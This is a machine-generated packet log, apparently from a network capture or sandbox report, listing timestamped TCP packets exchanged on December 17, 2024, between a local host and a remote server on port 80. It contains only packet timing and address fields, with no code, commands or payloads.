                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.303742886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.303844929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.304614067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.304734945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.304816008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.305876017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306005955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306139946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306727886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306776047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306909084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.307492018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.307583094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.307660103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.490819931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.491559029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.491668940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.491763115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.492506981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.492597103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.492739916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.493473053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.493591070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.493769884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.494402885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.494561911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.494764090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.495443106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.495600939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.495929956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.496342897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.496436119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.496548891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.497319937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.497399092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.497490883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.498361111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.498558998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.498816967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.499238014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.499352932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.499480009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.500180960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.500257969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.500335932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.501075029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.501171112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.501247883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.501997948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.502089024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.502197027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.502996922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.503132105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.503211021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.503937006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.504043102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.504153967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.504905939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.504976034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.505069017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.505832911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.505964994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.506315947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.506756067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.506831884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.506936073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.507735014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.507898092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.508033037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.508668900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.508779049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.508872032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.509655952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.509741068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.509866953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.510585070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.510698080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.510792971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.511629105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.511687994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.511780977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.512512922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.512609005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.512723923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.513463974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.513618946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.513736010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.514378071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.514482975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.514611959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.515378952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.515491009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.515769005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.516261101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.516391039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.517246008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.517329931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.517350912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.517831087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.518183947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.518315077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.518418074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.519123077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.519238949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.519321918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.520131111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.520267963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.520391941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.521050930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.521147966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.521274090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.521996975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.708153009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.708221912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.708414078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.709048986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.709120035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.709253073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.709909916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710012913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710135937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710838079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710913897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710999012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.711781979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.711896896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.711971045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.712704897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.712827921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.712904930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.713685989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.713814974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.713897943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.714634895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.714735031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.714823008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.715709925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.715958118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.716058969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.716595888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.716659069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.716779947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.717490911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.717576981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.717659950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.718463898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.718553066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.718758106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.719443083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.719693899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.720027924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.720360994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.720485926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.720670938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.721316099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.721400976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.721482992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.722265959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.722383022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.722492933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.723265886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.723404884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.723547935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.724188089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.724256992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.724473000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.725219011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.725388050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.725469112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.726073980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.726247072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.726630926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.727060080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.727191925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.727335930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.728035927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.769834042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870065928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870199919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870335102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870630980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870742083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870830059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870877981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.871659994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.871714115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.871843100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.872598886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.872713089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.872865915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.873538017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.873756886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.873868942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.874500036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.874639988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.874681950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.875468969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.875535965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.875619888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.876389980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.876488924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.876581907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.877388954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.877554893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.877633095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.878350973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.878472090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.878554106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.879245996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.879327059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081790924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081882954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081896067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081984043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081995964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082063913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082098961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082108974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082241058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082241058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082241058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082241058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082369089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082380056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082396984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082407951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082417965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082427979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082686901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082706928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082716942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082727909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082737923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082747936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082760096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082796097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082796097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082797050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083008051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083019972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083029985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083062887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083074093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083206892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083216906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083228111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083239079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083249092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083260059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083265066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083270073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083281040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083345890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083345890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083789110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083801031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083811998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083822966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083833933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084009886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084031105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084312916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084312916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084314108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087434053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087487936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087500095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087631941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087642908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087655067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087666035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087717056 CET4970980192.168.2.8185.81.68.147
